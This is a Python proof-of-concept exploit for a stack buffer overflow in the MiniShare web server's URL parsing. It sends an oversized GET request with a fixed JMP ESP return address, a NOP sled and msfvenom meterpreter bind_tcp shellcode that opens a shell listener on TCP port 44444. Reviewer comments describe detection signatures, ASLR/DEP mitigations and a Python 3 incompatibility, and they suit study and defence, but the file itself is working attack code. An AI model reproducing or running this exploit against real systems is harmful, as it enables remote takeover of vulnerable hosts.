#!/usr/bin/python
#Written in python
# Proof-of-concept request builder for the MiniShare URL-parsing stack overflow
# described in the comments below. Read here from a defensive angle: the
# script takes one positional argument (a host, sys.argv[1] — no check that it
# was supplied, so a missing argument raises IndexError), opens one TCP
# connection to port 80, sends a single oversized GET request and exits.
# NOTE(review): the request is assembled as a str ("GET ", "A"*1787, ...)
# while the shellcode lines use b"..." literals. That mix only works as
# written under Python 2, where the b prefix is a no-op; Python 3 raises
# TypeError on the first `buf += b"..."`.
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Connect to port 80
# No timeout is set on the socket, so a filtered or unreachable host blocks
# connect() (and send() further down) indefinitely.
sock.connect((sys.argv[1],80))
#Minishare URL parsing is vulnerable,
# We will send a request on the target machine on port 80 with our payload
#We have to use the proper HTTP headers so that the application parses our request.
buf="GET "
#Offset found at 1787
# Detection note: a request-target of ~1.8 KB of one repeated byte followed by
# non-printable bytes is an easy signature for an IDS/WAF rule, and any HTTP
# front-end that enforces a sane request-line length limit would drop it
# before it reaches the vulnerable parser.
buf+="A"*1787
#JMP ESP to an address in user32.dll 7E 42 93 53, JMP ESP
# Mitigation note: this is a fixed absolute address written little-endian on
# the next line. It relies on user32.dll loading at the same base every time;
# ASLR relocating the module, or DEP refusing to execute the stack-resident
# bytes that follow, defeats this path.
buf+="\x53\x93\x42\x7e"
#Nop sled
buf+="\x90"*40
#Same shellcode as ServerStrcpy
# The payload bytes below are opaque here; the msfvenom line near the end of
# the file records how they were generated.
buf += b"\xdb\xd3\xbb\x50\x28\x15\x7d\xd9\x74\x24\xf4\x5f\x2b"
buf += b"\xc9\xb1\x4e\x83\xef\xfc\x31\x5f\x14\x03\x5f\x44\xca"
buf += b"\xe0\x81\x8c\x88\x0b\x7a\x4c\xed\x82\x9f\x7d\x2d\xf0"
buf += b"\xd4\x2d\x9d\x72\xb8\xc1\x56\xd6\x29\x52\x1a\xff\x5e"
buf += b"\xd3\x91\xd9\x51\xe4\x8a\x1a\xf3\x66\xd1\x4e\xd3\x57"
buf += b"\x1a\x83\x12\x90\x47\x6e\x46\x49\x03\xdd\x77\xfe\x59"
buf += b"\xde\xfc\x4c\x4f\x66\xe0\x04\x6e\x47\xb7\x1f\x29\x47"
buf += b"\x39\xcc\x41\xce\x21\x11\x6f\x98\xda\xe1\x1b\x1b\x0b"
buf += b"\x38\xe3\xb0\x72\xf5\x16\xc8\xb3\x31\xc9\xbf\xcd\x42"
buf += b"\x74\xb8\x09\x39\xa2\x4d\x8a\x99\x21\xf5\x76\x18\xe5"
buf += b"\x60\xfc\x16\x42\xe6\x5a\x3a\x55\x2b\xd1\x46\xde\xca"
buf += b"\x36\xcf\xa4\xe8\x92\x94\x7f\x90\x83\x70\xd1\xad\xd4"
buf += b"\xdb\x8e\x0b\x9e\xf1\xdb\x21\xfd\x9d\x28\x08\xfe\x5d"
buf += b"\x27\x1b\x8d\x6f\xe8\xb7\x19\xc3\x61\x1e\xdd\x24\x58"
buf += b"\xe6\x71\xdb\x63\x17\x5b\x1f\x37\x47\xf3\xb6\x38\x0c"
buf += b"\x03\x37\xed\xb9\x08\x9e\x5e\xdc\xf2\x4a\x5e\x4a\x0f"
buf += b"\xe2\x8a\x85\xd0\x12\xb5\x4f\x79\xba\x48\x70\x2b\xa6"
buf += b"\xc4\x96\x59\xc6\x80\x01\xf6\x24\xf7\x99\x61\x57\xdd"
buf += b"\x63\xad\xd2\x86\x3c\x46\xab\xde\xfb\x69\x2c\xf5\xab"
buf += b"\xfd\xa6\x1a\x68\x1f\xb9\x36\xd8\x48\x2d\xcc\x89\x3b"
buf += b"\xcc\xd1\x83\xae\x0e\x44\x28\x79\x59\xf0\x32\x5c\xad"
buf += b"\x5f\xcc\x8b\xae\x98\x32\x4a\x9d\xd3\x05\xd8\x9d\x8b"
buf += b"\x69\x0c\x1d\x4c\x3c\x46\x1d\x24\x98\x32\x4e\x51\xe7"
buf += b"\xee\xe3\xca\x72\x11\x55\xbe\xd5\x79\x5b\x99\x12\x26"
buf += b"\xa4\xcc\x20\x21\x5a\x91\x21\xd3\x99\x44\xe8\xa6\xf4"
buf += b"\x54\x4f\xb8\xb3\xf9\xe6\x53\xbb\xae\xf9\x71"
# Closes the request line and sends an empty header block so the server's
# HTTP parser treats the whole thing as one complete request.
buf+="HTTP/1.1\r\n\r\n"
#NOP sled. Your address might be an instruction space which is not properly pointed to by stack due to various reasons.
#msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.59.130 LPORT=44444 --bad-chars '\x00\x0a\x0d' -f python
#Your shellcode might have bad characters as well which need to be truncated.
# Detection note: per the msfvenom line above the payload is a bind_tcp
# stager, so a successful run would leave the MiniShare host listening on
# TCP/44444. An unexpected new listener on the web-server process is the
# post-exploitation signal to hunt for; the excluded bytes (NUL, LF, CR) are
# the ones that would terminate the request line early in the server's parser.
# NOTE(review): LHOST is not meaningful for a bind payload; presumably ignored
# by msfvenom — confirm if regenerating.
# send() may transmit only part of buf; its return value is not checked, so a
# short write goes unnoticed.
sock.send(buf)
sock.close()